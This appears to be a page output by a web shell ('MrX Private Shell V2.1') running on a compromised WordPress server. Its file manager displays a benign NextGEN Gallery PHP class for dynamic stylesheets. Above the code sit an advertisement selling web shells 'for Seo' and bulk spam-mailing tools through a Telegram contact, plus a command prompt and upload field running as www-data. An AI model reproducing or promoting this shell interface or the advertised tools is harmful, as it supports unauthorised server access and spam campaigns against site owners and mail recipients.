__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

namespace Imagely\NGG\DynamicStylesheets;

use Imagely\NGG\Display\View;
use Imagely\NGG\Display\StaticAssets;
use Imagely\NGG\Settings\Settings;

class Manager {

	protected static $_instances = [];

	/**
	 * @var array<string>
	 */
	protected $templates = [];

	public static function get_instance( $context = false ) {
		if ( ! isset( self::$_instances[ $context ] ) ) {
			self::$_instances[ $context ] = new Manager();
		}
		return self::$_instances[ $context ];
	}

	/**
	 * Registers a template with the dynamic stylesheet utility. A template must be registered before it can be loaded.
	 *
	 * @param string $name
	 * @param string $template
	 */
	public function register( $name, $template ) {
		$this->templates[ $name ] = $template;
	}

	public function get_css_template( $name ) {
		return $this->templates[ $name ];
	}

	/**
	 * Loads a template, along with the dynamic variables to be interpolated.
	 *
	 * @param string $name
	 * @param array  $data (optional)
	 */
	public function enqueue( $name, $data = [] ) {
		if ( ( $template_name = $this->get_css_template( $name ) ) !== false ) {
			if ( is_subclass_of( $data, 'C_DataMapper_Model' ) ) {
				$data = $data->get_entity();
			}

			if ( defined( 'NGG_INLINE_DYNAMIC_CSS' ) && NGG_INLINE_DYNAMIC_CSS ) {
				$view = new View( $template_name, $data );
				$css  = $view->render( true );

				\wp_enqueue_style(
					'ngg_dyncss',
					StaticAssets::get_url( 'Display/DynamicStylesheets.css' ),
					[],
					NGG_SCRIPT_VERSION
				);
				wp_add_inline_style( 'ngg_dyncss', $css );
			} else {
				// Prevent albums with many children from creating GET URL that exceed the RFC limits.
				if ( isset( $data->original_album_entities ) ) {
					unset( $data->original_album_entities );
				}

				$slug         = Settings::get_instance()->get( 'dynamic_stylesheet_slug' );
				$encoded_data = $this->encode( $data );
				\wp_enqueue_style(
					'dyncss-' . $template_name . $encoded_data . '@dynamic',
					"/{$slug}" . "?name={$name}&data={$encoded_data}",
					[],
					NGG_SCRIPT_VERSION
				);
			}
		}
	}

	/**
	 * Encodes $data
	 *
	 * Base64 encoding uses '==' to denote the end of the sequence, but keep it out of the url
	 *
	 * @param $data
	 * @return string
	 */
	public function encode( $data ) {
		$data = json_encode( $data );
		$data = base64_encode( $data );
		$data = str_replace( '/', '\\', $data );
		$data = rtrim( $data, '=' );
		return $data;
	}

	/**
	 * Decodes $data
	 *
	 * @param $data
	 * @return array|mixed
	 */
	public function decode( $data ) {
		$data = str_replace( '\\', '/', $data );
		$data = base64_decode( $data . '==' );
		$data = json_decode( $data );
		return $data;
	}
}

Filemanager

Name Type Size Permission Actions
Controller.php File 1.75 KB 0644
Manager.php File 2.63 KB 0644
Filemanager